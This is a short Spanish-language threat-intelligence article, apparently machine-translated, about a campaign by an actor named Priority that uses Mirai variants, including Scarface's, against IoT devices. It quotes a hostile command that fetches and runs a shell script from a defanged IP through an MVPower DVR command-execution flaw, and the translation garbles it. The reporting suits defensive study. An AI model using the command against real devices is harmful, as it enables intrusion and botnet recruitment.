Scarface Botnet

Cuando una amenaza de malware obtiene su código fuente filtrado o liberado al público por los propios desarrolladores, permite que incluso los actores de amenazas no tan experimentados la tomen, hagan ajustes para satisfacer mejor sus necesidades y la desaten en la naturaleza. Este comportamiento exacto se ha detectado varias veces desde que se publicó el código de la infame Mirai Botnet en foros de piratas informáticos en 2016.

Un actor de amenazas que se identifica a sí mismo como Priority está detrás de una campaña de ataque que involucra dos variantes diferentes de Mirai. La primera carga útil que implementó se basó en la variante Demonbot Mirai y se centró específicamente en los ataques de Hadoop. La segunda carga útil adoptada más adelante en la campaña es mucho más avanzada y se basa en la variante Mirai desarrollada por Scarface. Scarface es un conocido desarrollador de malware que tomó el código Mirai e intentó hacerlo accesible para los piratas informáticos novatos más fácilmente, al tiempo que adaptaba la amenaza para infectar dispositivos de Internet de las cosas (IoT).

La campaña Priority se centra en escanear varios puertos: 500, 5501, 5502, 5050 y 60001, y atacarlos con un solo comando con el comando 'GET / shell? Cd% 20 / tmp;% 20wget% 20http: // 45 ( .) 13.58.4 / TPJ.sh; mando. Según los analistas de seguridad de la información que analizaron la campaña de Prioridad, el atacante parece tener un objetivo específico en mente porque apunta al puerto 60001 principalmente, mientras que los otros cuatro sirven más como distracción que cualquier otra cosa. Además, determinaron que Priority debe ser bastante inexperto, evidenciado por el hecho de que solo se explotó una vulnerabilidad como vector de compromiso: MVPower DVR Shell Unuthenticated Command Execution, en lugar de la cantidad habitual de entre 3 y 7 exploits que se encuentran en otros similares. amenazas.

Todos los ataques iniciales fueron lanzados por una única dirección IP alojada en un servidor privado virtual (VPS) proporcionado por Digital Ocean. Los piratas informáticos a menudo recurren a VPS debido a la flexibilidad que brindan para configurar un servidor rápidamente y luego purgarlo igualmente rápido.